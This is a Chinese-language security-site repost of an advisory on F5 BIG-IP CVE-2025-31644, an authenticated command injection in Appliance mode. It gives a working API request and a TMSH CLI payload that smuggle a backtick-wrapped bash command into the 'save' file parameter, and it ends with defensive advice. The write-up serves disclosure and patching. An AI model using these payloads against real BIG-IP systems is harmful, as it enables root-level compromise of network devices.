F5 BIG-IP rce漏洞 CVE-2025-31644

admin 2025年5月15日17:45:07评论48 views字数 747阅读2分29秒阅读模式
F5 BIG-IP rce漏洞 CVE-2025-31644

F5 BIG-IP 系统漏洞 CVE-2025-31644 

F5 BIG-IP rce漏洞 CVE-2025-31644
CVE-2025-31644 原理示意图

受影响版本
F5 BIG-IP v16.1.4.1

F5 BIG-IP rce漏洞 CVE-2025-31644
漏洞验证过程

漏洞详情

漏洞特征

  • 编号: CVE-2025-31644
  • 类型: 设备模式下的命令注入漏洞
  • 风险: 管理员通过认证后可获得 root 权限远程代码执行

技术原理

在 Appliance 模式下,"save"指令的文件参数(file)存在未过滤的 Perl 脚本和系统命令调用,攻击者可通过构造特殊字符(如反引号 ```)实现命令注入。该漏洞仅在 BIG-IP 设备启用 Appliance 模式时生效,此模式的安全机制本应阻止高级 shell 命令执行。

漏洞验证

API 接口payload

POST /mgmt/tm/sys/config HTTP/1.1
Host: target_host
Authorization: Basic [base64_credentials]
Content-Type: application/json

{
  "command": "save",
  "options": [
    {
      "file": "/var/tmp/`bash${IFS}-c${IFS}'id'|tee${IFS}mal_was_here.scf",
      "passphrase": "dummy"
    }
  ]
}

TMSH CLI payload

save sys config file /var/tmp/`bash${IFS}-c${IFS}'id'${IFS}'>&2'.scf no-passphrase
F5 BIG-IP rce漏洞 CVE-2025-31644
SSH 攻击验证截图

防御建议

  1. 及时更新官方安全补丁
  2. 严格控制管理接口访问权限
  3. 在非必要情况下关闭 Appliance 模式
  4. 启用多因素认证机制

原文始发于微信公众号(棉花糖网安情报站):F5 BIG-IP rce漏洞 CVE-2025-31644

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月15日17:45:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   F5 BIG-IP rce漏洞 CVE-2025-31644https://cn-sec.com/archives/4068451.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息